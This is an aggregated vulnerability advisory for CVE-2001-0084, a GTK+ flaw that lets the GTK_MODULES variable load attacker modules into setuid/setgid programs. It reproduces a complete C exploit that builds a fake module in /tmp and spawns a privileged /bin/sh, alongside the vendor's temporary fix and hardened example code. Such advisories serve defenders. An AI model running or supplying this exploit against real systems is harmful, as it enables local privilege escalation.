CVE-2001-0084
CVSS 7.2
Published: 2001-02-12 00:00:00
Revised: 2008-09-05 16:23:13

[Original] GTK+ library allows local users to specify arbitrary modules via the GTK_MODULES environmental variable, which could allow local users to gain privileges if GTK+ is used by a setuid/setgid program.


[CNNVD] GTK+ Arbitrary Loadable Module Execution Vulnerability (CNNVD-200102-069)

        A vulnerability exists in the GTK+ library. Local users can specify arbitrary modules via the GTK_MODULES environment variable, allowing them to gain elevated privileges when GTK+ is used by a setuid/setgid program.

- CVSS (Base Score)

CVSS score: 7.2 [HIGH]
Confidentiality impact: COMPLETE [total information disclosure; all system files exposed]
Integrity impact: COMPLETE [system integrity can be completely compromised]
Availability impact: COMPLETE [can lead to a complete system outage]
Attack complexity: LOW [no access restrictions on exploitation]
Attack vector: LOCAL [exploitation requires physical access or a local account]
Authentication: NONE [no authentication required for exploitation]

- CPE (Affected Platforms and Products)

Product and version information (CPE) not yet available

- OVAL (Technical Details for Detection)

No related OVAL definitions found

- Official Database Links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0084
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2001-0084
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200102-069
(Official data source) CNNVD

- Other Links and Resources

http://www.securityfocus.com/bid/2165
(VENDOR_ADVISORY)  BID  2165
http://www.gtk.org/setuid.html
(UNKNOWN)  MISC  http://www.gtk.org/setuid.html
http://archives.neohapsis.com/archives/bugtraq/2001-01/0027.html
(UNKNOWN)  BUGTRAQ  20010103 Claimed vulnerability in GTK_MODULES
http://archives.neohapsis.com/archives/bugtraq/2000-12/0498.html
(UNKNOWN)  BUGTRAQ  20010102 gtk+ security hole.

- Vulnerability Information

GTK+ Arbitrary Loadable Module Execution Vulnerability
High severity, Design Error
Published 2001-02-12 00:00:00, Updated 2005-10-20 00:00:00
Local
        A vulnerability exists in the GTK+ library. Local users can specify arbitrary modules via the GTK_MODULES environment variable, allowing them to gain elevated privileges when GTK+ is used by a setuid/setgid program.

- Advisories and Patches

        A temporary fix is to add the following line of code to line 215 (approximately in GTK 1.2.8 ) of source file gtkmain. The line should read as follows:
        env_string = getenv ("GTK_MODULES");
        The following line should be added above it:
        if(geteuid() == getuid())

- Vulnerability Information (20526)

GTK+ 1.2.8 Arbitrary Loadable Module Execution Vulnerability (EDBID:20526)
Platform: unix, Type: local
2001-01-02 Verified
Author: V9
N/A
source: http://www.securityfocus.com/bid/2165/info

GTK+ is the Gimp Toolkit, freely available to the public and maintained by the GTK Development Team. A problem exists in the Gimp Toolkit that could allow a user elevated privileges.

The problem occurs in the ability to load modules with the GTK_MODULES environment variable. It is possible to specify a path to modules that may not be part of the GTK+ package using this environment variable. By doing so, a custom crafted module can be loaded by the toolkit. Once loaded by the toolkit, the module is executed. This issue makes it possible for a user with malicious intent to potentially gain elevated privileges, overwrite system files, or execute arbitrary and potentially dangerous code. 

/* (*)gtk+[v*] local module exploit, by v9[v9@fakehalo.org].  this will give
   you the euid/egid of a set*id program using gtk+.  this exploit works via
   the GTK_MODULES environmental variable, by tricking gtk to execute arbitrary
   functions/commands with a bogus module. (using gtk_module_init())

   example(./xgtk):
-------------------------------------------------------------------------------
# ls -l /usr/bin/X11/gtk_program
-rwxr-sr-x   1 root     tty        437625 Oct 23  1999 /usr/bin/X11/gtk_program
# cc xgtk.c -o xgtk
# ./xgtk /usr/bin/X11/gtk_program :0.0
[ (*)gtk+[v*] local module exploit, by v9[v9@fakehalo.org]. ]
[ program: /usr/bin/X11/gtk_program(->/bin/sh), display: :0.0. ]

[*] making module for gtk+ to execute. (/tmp/gtkm.c)
[*] done, compiling module source file. (/tmp/gtkm.c->/tmp/gtkm.so)
[*] done, checking to see if the module comiled. (/tmp/gtkm.so)
[*] done, setting up the environment. (module&display)
[*] done, executing /usr/bin/X11/gtk_program, the module should load now.
[*] success, module loaded successfully.
[*] id stats: uid: 0, euid: 0, gid: 0, egid: 5.
[*] now executing: /bin/sh.
# 
-------------------------------------------------------------------------------

   note: this will require a valid display to exploit successfully.  also, i'm
         unsure of this for other gtk versions, i would just assume as much
         that this applies to it.
*/
#define GCCPATH "/usr/bin/gcc"  // path to gcc.
#define SRCFILE "/tmp/gtkm.c"   // source to the fake module to load.
#define MODEXEC "/tmp/gtkm.so"  // fake module to load.
#define DISPLAY ":0.0"          // default display. (also argv option)
#define EXECUTE "/bin/sh"       // execute this program.
#include <stdio.h>
#include <stdlib.h>     // exit(), system(), setenv()
#include <string.h>     // strncpy()
#include <unistd.h>     // unlink(), execl()
#include <sys/stat.h>
int main(int argc,char **argv){
 char cmd[256],syscmd[256],display[256];
 struct stat mod1,mod2,mod3;
 FILE *source;
 fprintf(stderr,"[ (*)gtk+[v*] local module exploit, by v9[v9@fakehalo.org]. ]"
 "\n");
 if(argc>1){strncpy(cmd,argv[1],sizeof(cmd));cmd[sizeof(cmd)-1]=0;}
 else{
  fprintf(stderr,"[!] syntax: %s </path/to/program> [display]\n",argv[0]);
  exit(-1);
 }
 if(argc>2){strncpy(display,argv[2],sizeof(display));}
 else{strncpy(display,DISPLAY,sizeof(display));}
 display[sizeof(display)-1]=0;  // strncpy does not guarantee termination.
 if(stat(cmd,&mod1)){
  fprintf(stderr,"[!] failed, %s doesn't seem to exist. (path needed)\n",cmd);
  exit(-1);
 }
 if(stat(GCCPATH,&mod2)){
  fprintf(stderr,"[!] failed, %s compiler doesn't seem to exist.\n",GCCPATH);
  exit(-1);
 }
 fprintf(stderr,"[ program: %s(->%s), display: %s. ]\n\n",cmd,EXECUTE,display);
 fprintf(stderr,"[*] making module for gtk+ to execute. (%s)\n",SRCFILE);
 unlink(SRCFILE);
 unlink(MODEXEC);
 source=fopen(SRCFILE,"w");
 fprintf(source,"#include <stdio.h>\n");
 fprintf(source,"#include <unistd.h>\n");  // unlink/execl/getuid declarations.
 fprintf(source,"void gtk_module_init(){\n");
 fprintf(source," unlink(\"%s\");\n",SRCFILE);
 fprintf(source," unlink(\"%s\");\n",MODEXEC);
 fprintf(source," fprintf(stderr,\"[*] success, module loaded successfully.\\n"
 "\");\n");
 fprintf(source," fprintf(stderr,\"[*] id stats: uid: %%d, euid: %%d, gid: %%d"
 ", egid: %%d.\\n\",getuid(),geteuid(),getgid(),getegid());\n");
 fprintf(source," fprintf(stderr,\"[*] now executing: %s.\\n\");\n",EXECUTE);
 fprintf(source," execl(\"%s\",\"%s\",(char *)0);\n",EXECUTE,EXECUTE);
 fprintf(source,"}\n");
 fclose(source);
 fprintf(stderr,"[*] done, compiling module source file. (%s->%s)\n",SRCFILE,
 MODEXEC);
 snprintf(syscmd,sizeof(syscmd),"%s -shared -o %s %s 1>/dev/null 2>&1",GCCPATH,
 MODEXEC,SRCFILE);
 system(syscmd);
 fprintf(stderr,"[*] done, checking to see if the module comiled. (%s)\n",
 MODEXEC);
 if(stat(MODEXEC,&mod3)){
  fprintf(stderr,"[!] failed, %s was not compiled properly. (gcc failed)\n",
  MODEXEC);
  exit(-1);
 }
 fprintf(stderr,"[*] done, setting up the environment. (module&display)\n");
 setenv("GTK_MODULES",MODEXEC,1);
 setenv("DISPLAY",display,1);
 fprintf(stderr,"[*] done, executing %s, the module should load now.\n",cmd);
 if(execl(cmd,cmd,(char *)NULL)){  // execl only returns on failure.
  fprintf(stderr,"[!] failed, %s did not execute properly.\n",cmd);
  unlink(SRCFILE);
  unlink(MODEXEC);
  exit(-1);
 }
}


- Vulnerability Information

13796
GTK+ Library gtk_program GTK_MODULES Variable Subversion Privilege Escalation
Location: Local Access Required; Attack Type: Input Manipulation
Impact: Loss of Integrity
Exploit: Public

- Vulnerability Description

- Timeline

2001-01-02 Unknown
2001-01-02 Unknown

- Solution

Products

Unknown or Incomplete

- References

- Vulnerability Author

Unknown or Incomplete

- Vulnerability Information

GTK+ Arbitrary Loadable Module Execution Vulnerability
Class: Design Error, BID: 2165
Remote: No, Local: Yes
Published: 2001-01-02 12:00:00, Updated: 2009-07-11 04:46:00
This vulnerability was announced by v9 <v9@fakehalo.org> on January 2, 2001 via the Bugtraq.

- Affected Program Versions

GTK GTK+ 1.2.8
+ Conectiva Linux 6.0
+ Debian Linux 2.2
+ Mandriva Linux Mandrake 7.2
+ RedHat Linux 7.0
+ S.u.S.E. Linux 7.0
- Sun Solaris 8_sparc

- Vulnerability Discussion

GTK+ is the Gimp Toolkit, freely available to the public and maintained by the GTK Development Team. A problem exists in the Gimp Toolkit that could allow a user elevated privileges.

The problem occurs in the ability to load modules with the GTK_MODULES environment variable. It is possible to specify a path to modules that may not be part of the GTK+ package using this environment variable. By doing so, a custom crafted module can be loaded by the toolkit. Once loaded by the toolkit, the module is executed. This issue makes it possible for a user with malicious intent to potentially gain elevated privileges, overwrite system files, or execute arbitrary and potentially dangerous code.

- Exploit

This exploit was contributed by V9 <v9@fakehalo.org>:

- Solution

A temporary fix is to add the following line of code to line 215 (approximately in GTK 1.2.8 ) of source file gtkmain. The line should read as follows:

env_string = getenv ("GTK_MODULES");

The following line should be added above it:

if(geteuid() == getuid())
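The guard in the temporary fix above (both in the "Advisories and Patches" entry and here) is the general rule for any library that lets an environment variable select a loadable module: the variable is only trustworthy when the process has the same privileges as the user who set it. The following is an added example, not GTK+ code, contrasting the unguarded lookup with one that compares the real and effective uid and gid before honouring GTK_MODULES. The function and variable names are mine; the module paths in the comments and test are constructed sample values.

```c
/* Added example (not GTK+ code): environment-selected module loading,
 * unguarded beside guarded. The guard is the same idea as the temporary fix:
 * only honour GTK_MODULES when real and effective ids match, i.e. the process
 * has not gained privileges through a set-user-ID or set-group-ID binary. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>

/* Vulnerable pattern: the environment is trusted unconditionally, so whoever
 * runs a setuid/setgid program chooses which shared object gets loaded. */
const char *modules_unguarded(const char *env_value)
{
    return env_value;   /* whatever the (untrusted) invoker put in the environment */
}

/* Hardened pattern: ignore the variable whenever the process runs with
 * privileges its invoker does not have. The gid pair is compared as well,
 * because setgid programs are affected in exactly the same way. */
const char *modules_guarded(const char *env_value,
                            uid_t uid, uid_t euid, gid_t gid, gid_t egid)
{
    if (uid != euid || gid != egid)
        return NULL;    /* privileged: do not load user-supplied modules */
    return env_value;   /* unprivileged: the user can only hurt themselves */
}

/* Wrapper over the live process ids. On glibc 2.17 and later, secure_getenv()
 * applies the same rule (it returns NULL when the process is "secure"). */
const char *gtk_modules_for_this_process(void)
{
    return modules_guarded(getenv("GTK_MODULES"),
                           getuid(), geteuid(), getgid(), getegid());
}

int main(void)
{
    const char *m = gtk_modules_for_this_process();
    printf("GTK_MODULES honoured: %s\n", m ? m : "(ignored or unset)");
    return 0;
}
```

Run the compiled binary normally and then as a setuid or setgid executable (constructed sample: `GTK_MODULES=/tmp/untrusted.so ./guard`); only the first invocation reports the variable. Note that the check must sit before the variable is used at all, not only before an absolute path is opened, since a module name resolved through a search path is just as attacker-controlled.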

- References
